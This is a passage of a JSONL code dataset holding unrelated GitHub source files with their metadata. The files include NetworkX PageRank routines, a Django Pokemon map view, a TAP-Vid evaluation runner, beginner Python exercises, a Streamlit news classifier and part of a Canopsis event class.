dangle=[n for n in W if out_degree[n]==0.0]\n i=0\n while True: # power iteration: make up to max_iter iterations\n xlast=x\n x=dict.fromkeys(xlast.keys(),0)\n danglesum=alpha*scale*sum(xlast[n] for n in dangle)\n for n in x:\n # this matrix multiply looks odd because it is\n # doing a left multiply x^T=xlast^T*W\n for nbr in W[n]:\n x[nbr]+=alpha*xlast[n]*W[n][nbr][weight]\n x[n]+=danglesum+(1.0-alpha)*p[n]\n # normalize vector\n s=1.0/sum(x.values())\n for n in x:\n x[n]*=s\n # check convergence, l1 norm\n err=sum([abs(x[n]-xlast[n]) for n in x])\n if err < tol:\n break\n if i>max_iter:\n raise NetworkXError('pagerank: power iteration failed to converge'\n 'in %d iterations.'%(i+1))\n i+=1\n return x\n\n\ndef google_matrix(G, alpha=0.85, personalization=None,\n nodelist=None, weight='weight'):\n \"\"\"Return the Google matrix of the graph.\n\n Parameters\n -----------\n G : graph\n A NetworkX graph\n\n alpha : float\n The damping factor\n\n personalization: dict, optional\n The \"personalization vector\" consisting of a dictionary with a\n key for every graph node and nonzero personalization value for each node.\n\n nodelist : list, optional\n The rows and columns are ordered according to the nodes in nodelist.\n If nodelist is None, then the ordering is produced by G.nodes().\n\n weight : key, optional\n Edge data key to use as weight. If None weights are set to 1.\n\n Returns\n -------\n A : NumPy matrix\n Google matrix of the graph\n\n See Also\n --------\n pagerank, pagerank_numpy, pagerank_scipy\n \"\"\"\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\\\n \"google_matrix() requires NumPy: http://scipy.org/\")\n # choose ordering in matrix\n if personalization is None: # use G.nodes() ordering\n nodelist=G.nodes()\n else: # use personalization \"vector\" ordering\n nodelist=personalization.keys()\n if set(nodelist)!=set(G):\n raise NetworkXError('Personalization vector dictionary'\n 'must have a value for every node')\n M=nx.to_numpy_matrix(G,nodelist=nodelist,weight=weight)\n (n,m)=M.shape # should be square\n if n == 0:\n return M\n # add constant to dangling nodes' row\n dangling=np.where(M.sum(axis=1)==0)\n for d in dangling[0]:\n M[d]=1.0/n\n # normalize\n M=M/M.sum(axis=1)\n # add \"teleportation\"/personalization\n e=np.ones((n))\n if personalization is not None:\n v=np.array(list(personalization.values()),dtype=float)\n else:\n v=e\n v=v/v.sum()\n P=alpha*M+(1-alpha)*np.outer(e,v)\n return P\n\n\ndef pagerank_numpy(G, alpha=0.85, personalization=None, weight='weight'):\n \"\"\"Return the PageRank of the nodes in the graph.\n\n PageRank computes a ranking of the nodes in the graph G based on\n the structure of the incoming links. It was originally designed as\n an algorithm to rank web pages.\n\n Parameters\n -----------\n G : graph\n A NetworkX graph\n\n alpha : float, optional\n Damping parameter for PageRank, default=0.85\n\n personalization: dict, optional\n The \"personalization vector\" consisting of a dictionary with a\n key for every graph node and nonzero personalization value for each node.\n\n weight : key, optional\n Edge data key to use as weight. If None weights are set to 1.\n\n Returns\n -------\n pagerank : dictionary\n Dictionary of nodes with PageRank as value\n\n Examples\n --------\n >>> G=nx.DiGraph(nx.path_graph(4))\n >>> pr=nx.pagerank_numpy(G,alpha=0.9)\n\n Notes\n -----\n The eigenvector calculation uses NumPy's interface to the LAPACK\n eigenvalue solvers. This will be the fastest and most accurate\n for small graphs.\n\n This implementation works with Multi(Di)Graphs.\n\n See Also\n --------\n pagerank, pagerank_scipy, google_matrix\n\n References\n ----------\n .. [1] A. Langville and C. Meyer,\n \"A survey of eigenvector methods of web information retrieval.\"\n http://citeseer.ist.psu.edu/713792.html\n .. [2] Page, Lawrence; Brin, Sergey; Motwani, Rajeev and Winograd, Terry,\n The PageRank citation ranking: Bringing order to the Web. 1999\n http://dbpubs.stanford.edu:8090/pub/showDoc.Fulltext?lang=en&doc=1999-66&format=pdf\n \"\"\"\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"pagerank_numpy() requires NumPy: http://scipy.org/\")\n if len(G) == 0:\n return {}\n # choose ordering in matrix\n if personalization is None: # use G.nodes() ordering\n nodelist=G.nodes()\n else: # use personalization \"vector\" ordering\n nodelist=personalization.keys()\n M=google_matrix(G, alpha, personalization=personalization,\n nodelist=nodelist, weight=weight)\n # use numpy LAPACK solver\n eigenvalues,eigenvectors=np.linalg.eig(M.T)\n ind=eigenvalues.argsort()\n # eigenvector of largest eigenvalue at ind[-1], normalized\n largest=np.array(eigenvectors[:,ind[-1]]).flatten().real\n norm=float(largest.sum())\n centrality=dict(zip(nodelist,map(float,largest/norm)))\n return centrality\n\n\ndef pagerank_scipy(G, alpha=0.85, personalization=None,\n max_iter=100, tol=1.0e-6, weight='weight'):\n \"\"\"Return the PageRank of the nodes in the graph.\n\n PageRank computes a ranking of the nodes in the graph G based on\n the structure of the incoming links. It was originally designed as\n an algorithm to rank web pages.\n\n Parameters\n -----------\n G : graph\n A NetworkX graph\n\n alpha : float, optional\n Damping parameter for PageRank, default=0.85\n\n personalization: dict, optional\n The \"personalization vector\" consisting of a dictionary with a\n key for every graph node and nonzero personalization value for each node.\n\n max_iter : integer, optional\n Maximum number of iterations in power method eigenvalue solver.\n\n tol : float, optional\n Error tolerance used to check convergence in power method solver.\n\n weight : key, optional\n Edge data key to use as weight. If None weights are set to 1.\n\n Returns\n -------\n pagerank : dictionary\n Dictionary of nodes with PageRank as value\n\n Examples\n --------\n >>> G=nx.DiGraph(nx.path_graph(4))\n >>> pr=nx.pagerank_scipy(G,alpha=0.9)\n\n Notes\n -----\n The eigenvector calculation uses power iteration with a SciPy\n sparse matrix representation.\n\n See Also\n --------\n pagerank, pagerank_numpy, google_matrix\n\n References\n ----------\n .. [1] A. Langville and C. Meyer,\n \"A survey of eigenvector methods of web information retrieval.\"\n http://citeseer.ist.psu.edu/713792.html\n .. [2] Page, Lawrence; Brin, Sergey; Motwani, Rajeev and Winograd, Terry,\n The PageRank citation ranking: Bringing order to the Web. 1999\n http://dbpubs.stanford.edu:8090/pub/showDoc.Fulltext?lang=en&doc=1999-66&format=pdf\n \"\"\"\n try:\n import scipy.sparse\n except ImportError:\n raise ImportError(\"pagerank_scipy() requires SciPy: http://scipy.org/\")\n if len(G) == 0:\n return {}\n # choose ordering in matrix\n if personalization is None: # use G.nodes() ordering\n nodelist=G.nodes()\n else: # use personalization \"vector\" ordering\n nodelist=personalization.keys()\n M=nx.to_scipy_sparse_matrix(G,nodelist=nodelist,weight=weight,dtype='f')\n (n,m)=M.shape # should be square\n S=scipy.array(M.sum(axis=1)).flatten()\n# for i, j, v in zip( *scipy.sparse.find(M) ):\n# M[i,j] = v / S[i]\n S[S>0] = 1.0 / S[S>0]\n Q = scipy.sparse.spdiags(S.T, 0, *M.shape, format='csr')\n M = Q * M\n x=scipy.ones((n))/n # initial guess\n dangle=scipy.array(scipy.where(M.sum(axis=1)==0,1.0/n,0)).flatten()\n # add \"teleportation\"/personalization\n if personalization is not None:\n v=scipy.array(list(personalization.values()),dtype=float)\n v=v/v.sum()\n else:\n v=x\n i=0\n while i <= max_iter:\n # power iteration: make up to max_iter iterations\n xlast=x\n x=alpha*(x*M+scipy.dot(dangle,xlast))+(1-alpha)*v\n x=x/x.sum()\n # check convergence, l1 norm\n err=scipy.absolute(x-xlast).sum()\n if err < n*tol:\n return dict(zip(nodelist,map(float,x)))\n i+=1\n raise NetworkXError('pagerank_scipy: power iteration failed to converge'\n 'in %d iterations.'%(i+1))\n\n\n# fixture for nose tests\ndef setup_module(module):\n from nose import SkipTest\n try:\n import numpy\n except:\n raise SkipTest(\"NumPy not available\")\n try:\n import scipy\n except:\n raise SkipTest(\"SciPy not available\")\n","repo_name":"miniBloq/v0.83","sub_path":"source/Bin/Minibloq/lang/PPythonWin/v2.7.5.1/App/Lib/site-packages/networkx/algorithms/link_analysis/pagerank_alg.py","file_name":"pagerank_alg.py","file_ext":"py","file_size_in_byte":12601,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"3"} +{"seq_id":"8269477522","text":"import folium\nimport json\n\nfrom django.http import HttpResponseNotFound\nfrom django.shortcuts import render\nfrom .models import Pokemon, PokemonEntity\nimport os\n\n\nMOSCOW_CENTER = [55.751244, 37.618423]\nDEFAULT_IMAGE_URL = \"https://vignette.wikia.nocookie.net/pokemon/images/6/6e/%21.png/revision/latest/fixed-aspect-ratio-down/width/240/height/240?cb=20130525215832&fill=transparent\"\n\n\ndef add_pokemon(folium_map, lat, lon, name, image_url=DEFAULT_IMAGE_URL):\n icon = folium.features.CustomIcon(\n image_url,\n icon_size=(50, 50),\n )\n folium.Marker(\n [lat, lon],\n tooltip=name,\n icon=icon,\n ).add_to(folium_map)\n\n\ndef show_all_pokemons(request):\n pokemons_entities = PokemonEntity.objects.select_related('pokemon')\n folium_map = folium.Map(location=MOSCOW_CENTER, zoom_start=12)\n for pokemon_entity in pokemons_entities:\n img_url = os.path.abspath(pokemon_entity.pokemon.image.url[1:])\n add_pokemon(\n folium_map, pokemon_entity.lat, pokemon_entity.lon,\n pokemon_entity.pokemon.title, img_url)\n\n pokemons_on_page = []\n pokemons = Pokemon.objects.all()\n for pokemon in pokemons:\n if pokemon.image:\n img_url = pokemon.image.url\n else:\n img_url = pokemon.image\n pokemons_on_page.append({\n 'pokemon_id': pokemon.id,\n 'img_url': img_url,\n 'title_ru': pokemon.title,\n })\n\n return render(request, \"mainpage.html\", context={\n 'map': folium_map._repr_html_(),\n 'pokemons': pokemons_on_page,\n })\n\n\ndef show_pokemon(request, pokemon_id):\n pokemon = Pokemon.objects.get(id=pokemon_id)\n \n if pokemon.id == int(pokemon_id):\n requested_pokemon = pokemon\n else:\n return HttpResponseNotFound('Такой покемон не найден
')\n\n folium_map = folium.Map(location=MOSCOW_CENTER, zoom_start=12)\n\n requested_pokemon_entities = PokemonEntity.objects.select_related('pokemon').filter(pokemon=requested_pokemon)\n for pokemon_entity in requested_pokemon_entities:\n img_url = os.path.abspath(pokemon_entity.pokemon.image.url[1:])\n add_pokemon(\n folium_map, pokemon_entity.lat, pokemon_entity.lon,\n pokemon_entity.pokemon.title, img_url)\n\n\n return render(request, \"pokemon.html\", context={'map': folium_map._repr_html_(),\n 'pokemon': pokemon})\n","repo_name":"anderskate/pokemon_map","sub_path":"pokemon_entities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11618108041","text":"import re\r\n\r\nf = open(\"witl-May-08-2020\", \"r\")\r\nfw = open(\"witl-May-09-2020.txt\", \"w\")\r\n\r\nstr_all = f.read()\r\ncode_all = re.findall(r'\\d+', str_all)\r\n# print(code_all)\r\nfor code in code_all:\r\n\tlink = \"nhentai.net/g/\" + code\r\n\tprint(link)\r\n\tfw.write(link)\r\n\tfw.write(\"\\n\")\r\nfw.close()\r\n","repo_name":"CooKingThe1st/nhentai_auto_most_like_legacy","sub_path":"fix_fail.py","file_name":"fix_fail.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40226067049","text":"# -*- origami-fold-style: triple-braces -*-\nimport sys\nimport os\nimport argparse\nimport tqdm\nimport numpy as np\nimport pickle\nfrom pathlib import Path\nimport socket\nimport datetime\nimport einops\nfrom collections import defaultdict\nimport pandas as pd\n\nfrom MFT.utils.various import with_debugger\nfrom MFT.config import load_config\nfrom MFT.evaluation import tapvid_eval_stuff as tves\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description='',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('dataset', help='dataset config', type=Path)\n parser.add_argument('trackers', help='path to tracker configs, all must share the same flow_config', type=Path,\n nargs='+')\n parser.add_argument('--export', help='result export directory', type=Path, required=True)\n parser.add_argument('--cache', help='flow cache directory', type=Path, required=True)\n parser.add_argument('--gpu', help='cuda device')\n parser.add_argument('-c', '--cont', help='skip already computed sequences', action='store_true')\n parser.add_argument('--debug', help='track with tracker debug info', action='store_true')\n parser.add_argument('-v', '--verbose', help='', action='store_true')\n parser.add_argument('--mode', help='TAP-Vid evaluation query modes', choices=['first', 'strided', 'both'],\n default='both')\n return parser\n\n\ndef parse_arguments():\n parser = get_parser()\n\n args = parser.parse_args()\n if args.gpu is not None:\n os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\n stdout_lvl = logging.DEBUG if args.verbose else logging.INFO\n stdout_handler = logging.StreamHandler()\n stdout_handler.setLevel(stdout_lvl)\n log_handlers = [stdout_handler]\n\n stamp = datetime.datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\n\n log_format = \"[%(asctime)s] %(levelname)s:%(name)s:%(message)s\"\n logging.basicConfig(level=logging.DEBUG, format=log_format, handlers=log_handlers)\n logging.getLogger(\"asyncio\").setLevel(logging.WARNING)\n logging.getLogger(\"matplotlib\").setLevel(logging.WARNING)\n logging.getLogger(\"ltr.admin.loading\").setLevel(logging.ERROR)\n\n hostname = socket.gethostname()\n cmdline = str(' '.join(sys.argv))\n logger.info(f\"cmd: {cmdline}\")\n logger.info(f\"start: {stamp}\")\n logger.info(f\"host: {hostname}\")\n\n return args\n\n\ndef run(args):\n configs = [load_config(path) for path in args.trackers]\n\n dataset_conf = load_config(args.dataset)\n\n if args.mode == 'both':\n query_modes = ['first', 'strided']\n else:\n query_modes = [args.mode]\n\n all_metrics = {'strided': defaultdict(list),\n 'first': defaultdict(list)}\n for pickle_path in tqdm.tqdm(dataset_conf.pickles, desc='pkl shards', position=0, leave=None, ascii=True):\n dataset = tves.create_tapvid_dataset(pickle_path, query_modes, dataset_conf.scaling, fake_video=True)\n for seq in tqdm.tqdm(dataset, desc='sequences', position=1, leave=None, ascii=True):\n orig_sequence_name = seq['video_name']\n video = seq[\"data\"][query_modes[0]][\"video\"] # all query_modes have the same [\"video\"]\n video = einops.rearrange(video, '1 N_frames H W C -> N_frames H W C', C=3)\n assert video.dtype == np.uint8\n\n for query_mode in tqdm.tqdm(query_modes, desc='query mode', position=2, leave=None, ascii=True):\n gt_data = seq[\"data\"][query_mode]\n query_points = einops.rearrange(gt_data['query_points'],\n '1 N_queries txy -> N_queries txy').astype(np.int64)\n gt_tracks = gt_data['target_points'] # (1, N_queries, N_frames, 2) in dataset-config-specific scale\n H, W = video.shape[1], video.shape[2]\n scale = einops.rearrange(np.array([256.0 / W, 256.0 / H]), 'xy -> 1 1 1 xy')\n gt_tracks *= scale\n gt_occluded = gt_data['occluded'] # (1, N_queries, N_frames)\n for tracker_config in tqdm.tqdm(configs, desc='trackers', position=3, leave=None, ascii=True):\n export_dir = args.export / tracker_config.name\n result_dir = export_dir / 'results'\n seq_querymode_tracker_result_path = result_dir / f'{orig_sequence_name}-{query_mode}.pklz'\n with open(seq_querymode_tracker_result_path, 'rb') as fin:\n tracklet_outputs = pickle.load(fin)\n pred_tracks = tracklet_outputs['tracks'] # (1, N_queries, N_frames), scaled to 256 x 256\n pred_occluded = tracklet_outputs['occluded'] # (1, N_queries, N_frames, xy)\n\n pred_occluded = np.float32(pred_occluded > 0.5)\n assert pred_tracks.shape[0] == 1\n assert pred_tracks.shape[3] == 2\n assert len(pred_tracks.shape) == 4\n assert gt_occluded.shape == pred_occluded.shape\n assert gt_tracks.shape == pred_tracks.shape\n metrics = tves.compute_tapvid_metrics(\n query_points,\n gt_occluded,\n gt_tracks,\n pred_occluded,\n pred_tracks,\n query_mode)\n # skip singleton dimension:\n assert all(val.shape == (1, ) for key, val in metrics.items())\n metrics = {key: val[0] for key, val in metrics.items()}\n metrics['seq'] = orig_sequence_name\n all_metrics[query_mode][tracker_config.name].append(metrics)\n\n for tracker_config in tqdm.tqdm(configs, desc='export', ascii=True):\n tracker_name = tracker_config.name\n export_dir = args.export / tracker_name\n eval_dir = export_dir / 'eval'\n eval_dir.mkdir(parents=True, exist_ok=True)\n\n for query_mode in query_modes:\n tracker_metrics = all_metrics[query_mode][tracker_name]\n\n tracker_metrics = {i: val for i, val in enumerate(tracker_metrics)}\n tracker_metrics = pd.DataFrame.from_dict(tracker_metrics, orient=\"index\")\n out_name = 'tapvid-eval'\n if query_mode == 'strided':\n out_name += '-strided'\n tracker_metrics.to_pickle(eval_dir / f'{out_name}.pklz')\n return 0\n\n\ndef all_same(xs):\n return all(x == xs[0] for x in xs)\n\n\ndef validate_configs(configs):\n # check that all the configs share the same tracker class and optical flow\n assert all_same([c.tracker_class for c in configs])\n assert all_same([c.flow_config for c in configs])\n\n\n@with_debugger\ndef main():\n args = parse_arguments()\n return run(args)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"serycjon/MFT","sub_path":"MFT/runners/eval_MFT_tapvid.py","file_name":"eval_MFT_tapvid.py","file_ext":"py","file_size_in_byte":6927,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"13773857813","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def mergeInBetween(self, list1: ListNode, a: int, b: int, list2: ListNode) -> ListNode:\n node = list1\n cnt = 1\n # if node.val != a: #not at the beginning \n while node:\n if node.next and cnt == a:\n left = node\n if cnt == b:\n right = node.next\n node = node.next\n cnt += 1\n left.next = list2\n while left.next:\n left = left.next\n left.next = right.next\n return list1\n # else:\n # while node:\n # if node.val == b:\n # right = node.next\n # node = node.next\n # node2 = list2\n # while node2.next:\n # node2 = node2.next\n # node2.next = right\n # return list2\n \n \n ","repo_name":"tans1/A2SV-Competitive-Programming","sub_path":"1669-merge-in-between-linked-lists/1669-merge-in-between-linked-lists.py","file_name":"1669-merge-in-between-linked-lists.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29011876696","text":"# Don't change the code below\nnumber = int(input(\"Which number do you want to check? \"))\n# Don't change the code above\n\n#Write your code below this line\nremainder = number % 2\n\nif remainder == 1:\n print(\"This is an odd number\")\nelse:\n print(\"This is an even number\")\n","repo_name":"timgarciaa/100DaysOfCodePython","sub_path":"Day3/OddOrEven.py","file_name":"OddOrEven.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"13851076881","text":"import setuptools\r\n\r\nwith open(\"README.md\", \"r\") as fh:\r\n long_description = fh.read()\r\n\r\nsetuptools.setup(\r\n name=\"ghcn_wa_database\", # Replace with your own username\r\n version=\"0.0.1\",\r\n author=\"Matt Roe\",\r\n author_email=\"matthew.a.roe@gmail.com\",\r\n description=(\"Tools to build and access a local SQLite database from the \\\r\n GHCN daily observations data at stations in Washington State, \\\r\n USA\"),\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/matroe1/ghcn_wa_database\",\r\n packages=setuptools.find_packages(),\r\n classifiers=[\r\n \"Programming Language :: Python :: 3\"\r\n ],\r\n python_requires='>=3.6',\r\n)\r\n","repo_name":"matroe1/ghcn_wa_database","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71716627283","text":"import rospy\nfrom geometry_msgs.msg import Twist\n\nclass CmdVelDistribute():\n\n\n\n\n\n def __init__(self):\n rospy.init_node('CmdVelDistribute',anonymous=False)\n self.sub1 = rospy.Subscriber('joy',Joy, self.setGoal)\n self.sub2 = rospy.Subscriber()\n self.pub = rospy.Publisher('car/cmd_vel',Twist, queue_size=10)\n self.pubmsg = PoseStamped()\n rate = rospy.Rate(10)\n\n\n\nif __name__ == \"__main__\":\n whatever = CmdVelDistribute","repo_name":"HaoYejia/Give-the-Blind-an-Elephant-in-the-Room","sub_path":"Scripts/temp/ws/src/temp/src/CmdVelDistribute.py","file_name":"CmdVelDistribute.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22455897296","text":"'''\n@Author: your name\n@Date: 2020-02-13 10:25:55\n@LastEditTime: 2020-03-02 11:04:36\n@LastEditors: Please set LastEditors\n@Description: In User Settings Edit\n@FilePath: \\vscode_code\\其他\\数据分析第二版\\数据清洗\\test.py\n'''\n#https://blog.csdn.net/luocheng7430/article/details/80330566\n#drop方法\nimport numpy as np \nimport pandas as pd\n\nprint(chr(ord('a')+1))\n\ndata = {\n 'state':['Ohio1','Ohio1','Ohio2','Nevada3','Nevada3'],\n 'year':[2000,2001,2002,2001,2002],\n 'pop':[1.5,1.7,3.6,2.4,2.9],\n 'salary':['1000K/MTH - 20000K/MTH', '7K/MTH - 8K/MTH',\n '10000K/MTH - 16000K/MTH', '3K/MTH - 5K/MTH', '7K/MTH - 12K/MTH',]\n}\ndata = pd.DataFrame(data)\nclean = data.drop(data[data['year'] == 2000].index)\nprint(clean)\n#下面这句和clean效果一样\nprint(data[data['year'] != 2000])\nprint(data[data['year'] == 2000].index)\n","repo_name":"Summer-Friend/data_analyze","sub_path":"数据清洗/drop.py","file_name":"drop.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"12606900773","text":"\"\"\"\nTests for toggles, where there is logic beyond enable/disable.\n\"\"\"\n\nfrom unittest.mock import patch\nimport ddt\n\nfrom django.test import override_settings\n\nfrom common.djangoapps.student.tests.factories import UserFactory\nfrom lms.djangoapps.learner_home.waffle import should_redirect_to_learner_home_mfe\nfrom xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase\n\n\n@ddt.ddt\nclass TestLearnerHomeRedirect(SharedModuleStoreTestCase):\n \"\"\"\n Tests for should_redirect_to_learner_home, used for experimental rollout.\n \"\"\"\n\n def setUp(self):\n super().setUp()\n\n # Set up a user for testing\n self.user = UserFactory\n\n @patch(\"lms.djangoapps.learner_home.waffle.ENABLE_LEARNER_HOME_MFE\")\n def test_should_redirect_to_learner_home_disabled(self, mock_enable_learner_home):\n # Given Learner Home MFE feature is not enabled\n mock_enable_learner_home.is_enabled.return_value = False\n\n # When I check if I should redirect\n redirect_choice = should_redirect_to_learner_home_mfe(self.user)\n\n # Then I never redirect\n self.assertFalse(redirect_choice)\n\n @ddt.data((0, True), (50, False), (100, True))\n @ddt.unpack\n @patch(\"lms.djangoapps.learner_home.waffle.ENABLE_LEARNER_HOME_MFE\")\n @override_settings(LEARNER_HOME_MFE_REDIRECT_PERCENTAGE=50)\n def test_should_redirect_to_learner_home_enabled(\n self, user_id, expect_redirect, mock_enable_learner_home\n ):\n # Given Learner Home MFE feature is enabled\n mock_enable_learner_home.is_enabled.return_value = True\n self.user.id = user_id\n\n # When I check if I should redirect\n redirect_choice = should_redirect_to_learner_home_mfe(self.user)\n\n # Then I redirect based on configuration\n # (currently user ID % 100 < redirect percentage)\n self.assertEqual(expect_redirect, redirect_choice)\n","repo_name":"openedx/edx-platform","sub_path":"lms/djangoapps/learner_home/test_waffle.py","file_name":"test_waffle.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"43937497551","text":"\nprint(\"hello world!\")\n\nprint(\"Bye world!\")\n\nnum1 = int(raw_input(\"Enter number #1: \"))\nnum2 = int(raw_input(\"Enter number #2: \"))\ntotal = num1 + num2\nprint(\"The sum is \" + str(total))\n\nnum = int(raw_input(\"Enter a number: \"))\nif num > 0:\n print(\"That is a positive number!\")\n print(\"It is greater than zero!\")\nelif num < 0:\n print(\"That's a negative number!\")\nelse:\n print(\"Zero is neither positive nor negative!\")\n\n\nstring = \"hello there\"\nfor letter in string:\n print(letter.upper())\n\nfor i in range(5):\n print(i)\n\nx = 1\nwhile x <= 5:\n print(x)\n x = x + 1\n\n\nmy_name = \"Bob\"\nfriend1 = \"Alice\"\nfriend2 = \"John\"\nfriend3 = \"Mallory\"\n\nprint(\n\"My bane is %s and my friends are %s, %s, and %s\" %\n(my_name, friend1, friend2, friend3)\n)\n\n\ndef greetAgent(first_name, last_name):\n print(\"%s. %s %s.\" % (last_name, first_name, last_name))\ngreetAgent('James', 'Bond')\n\n\ndef findSum(number):\n sum = 0\n for i in range(number):\n sum = sum + 1\n return sum + number\n\nprint(findSum(10))\n","repo_name":"lawrence1203/mycssi2019","sub_path":"WeLearn/M3-Python/l1-Pyhton_Intro/hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30858663821","text":"from lxml import etree\nimport gensim.models\nfrom gensim.test.utils import datapath\nfrom gensim.test.utils import get_tmpfile\nimport numpy as np\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom keras.preprocessing.sequence import pad_sequences\nimport keras\nfrom gensim.models.fasttext import FastText\nimport string\nfrom pprint import pprint as print\nfrom sklearn.model_selection import train_test_split\n\nclass DataGenerator(keras.utils.Sequence):\n 'Generates data for Keras'\n def __init__(self, name, dict_tag, file_path, maxlen, embedding, portion=1, batch_size=32, my_type =\"prediction\"):\n 'Initialization'\n self.my_file_path = file_path\n self.length = int(next(iter(etree.iterparse(self.my_file_path, tag=name)))[1].attrib[\"len\"])//portion\n self.generated_IDs = []\n self.type = my_type\n self.true_labels = np.empty((0,maxlen))\n self.dict_tag = dict_tag\n self.model_embedding = embedding\n self.batch_size = batch_size\n self.file = file_path\n self.parser_gen = iter(etree.iterparse(file_path, tag=\"s\"))\n self.max_len = maxlen\n def get_true_labels(self):\n return np.array(self.true_labels)\n \n def get_IDs(self):\n return self.generated_IDs\n \n def on_epoch_end(self):\n self.parser_gen = iter(etree.iterparse(self.my_file_path, tag=\"s\"))\n\n def __len__(self):\n 'Denotes the number of batches per epoch'\n return int(np.floor((self.length) / self.batch_size))\n\n def __getitem__(self, index):\n 'Generate one batch of data'\n # Generate indexes of the batch\n temp_sentences = []\n \n for i in range(batch_size):\n element = next(self.parser_gen)[1]\n temp_sentences.append(element)\n self.generated_IDs.append(element.attrib[\"i\"])\n if self.type != \"prediction\":\n sentences = [[(tkn.text.lower(), dict_tag[tkn.attrib[\"l\"]]) for tkn in sent] for sent in temp_sentences]\n else:\n sentences = [[tkn.text.lower() for tkn in sent] for sent in temp_sentences]\n element.clear()\n max_len = self.max_len\n X = [[w[0] for w in s] for s in sentences]\n new_X = []\n for seq in X:\n new_seq = []\n for i in range(max_len):\n try:\n new_seq.append(seq[i])\n except:\n new_seq.append(\"\",unsafe_allow_html=True)\n st.subheader(f\"Classifier Used: {model_choice}\")\n compute(Y_pred,Y_test)\n # if st.checkbox(\"WordCloud\"):\n st.subheader(\"WordCloud: \")\n c_text = news_text\n wordcloud = WordCloud().generate(c_text)\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.axis(\"off\")\n plt.show()\n st.pyplot()\n if choice==\"NLP\":\n st.info(\"Natural Language Processing\")\n news_text = st.text_area(\"Enter Text\", \"Type Here\")\n c_text = news_text\n df = pd.read_csv(\"data/BBC_News_Train_Processed.csv\")\n if st.button(\"Classify\"):\n prediction_labels = {0:'business', 1:'entertainment', 2:'politics', 3:'sport', 4:'tech'}\n news_text = process_text(news_text)\n news_text = pd.DataFrame({'Text':[news_text]})\n train, test = train_test_split(df, test_size = 0.2, random_state=42)\n news_text = news_text.apply(lambda r: TaggedDocument(words=tokenize_text(r['Text']), tags=[0]), axis=1)\n test_tagged = test.apply(lambda r: TaggedDocument(words=tokenize_text(r['Text']), tags=[r.Category]), axis=1)\n model_dbow = pickle.load(open('models\\\\nlp_model_dbow.sav', 'rb'))\n model_logistic = pickle.load(open('models\\\\nlp_model.sav', 'rb'))\n Y_text, X_text = vec_for_learning(model_dbow, news_text)\n Y_test, X_test = vec_for_learning(model_dbow, test_tagged)\n Y_pred = model_logistic.predict(X_test)\n Y_text = model_logistic.predict(X_text) \n result = prediction_labels[Y_text[0]]\n st.success(result)\n st.markdown(\"
\",unsafe_allow_html=True)\n st.subheader(\"Classifier Used: NLP with logistic regression\")\n compute(Y_pred, Y_test)\n st.subheader(\"WordCloud: \")\n \n wordcloud = WordCloud().generate(c_text)\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.axis(\"off\")\n plt.show()\n st.pyplot()\n\n \nif __name__ == '__main__':\n main()","repo_name":"devashree1923/News-Classification","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10148,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"11022189207","text":"from socket import setdefaulttimeout, getfqdn, gethostname, gethostbyaddr\nfrom time import time\nfrom re import compile as re_compile\nfrom logging import getLogger\n\nfrom canopsis.old.storage import get_storage\nfrom canopsis.old.account import Account\n\n\nclass Event(object):\n \"\"\"\n Manage event content\n\n An event contains information and require a type and source_type.\n \"\"\"\n\n SOURCE_TYPE = 'source_type'\n SOURCE = 'source'\n EVENT_TYPE = 'event_type'\n DATA = 'data'\n META = 'meta'\n RESOURCE = 'resource'\n COMPONENT = 'component'\n CONNECTOR = 'connector'\n CONNECTOR_NAME = 'connector_name'\n ENTITY = 'entity' #: entity id item name\n\n __slots__ = (EVENT_TYPE, SOURCE, DATA, META)\n\n def __init__(self, source, data, meta, _type=None):\n\n super(Event, self).__init__()\n\n self.type = type(self).__name__.lower() if _type is None else _type\n self.source = source\n self.data = data\n self.meta = meta\n\n @classmethod\n def new_event(event_class, **old_event):\n \"\"\"\n Create an Event from an old event (ficus and older version).\n \"\"\"\n\n _type = event_class.__name__.lower()\n _type = old_event.pop(Event.EVENT_TYPE, _type)\n source = 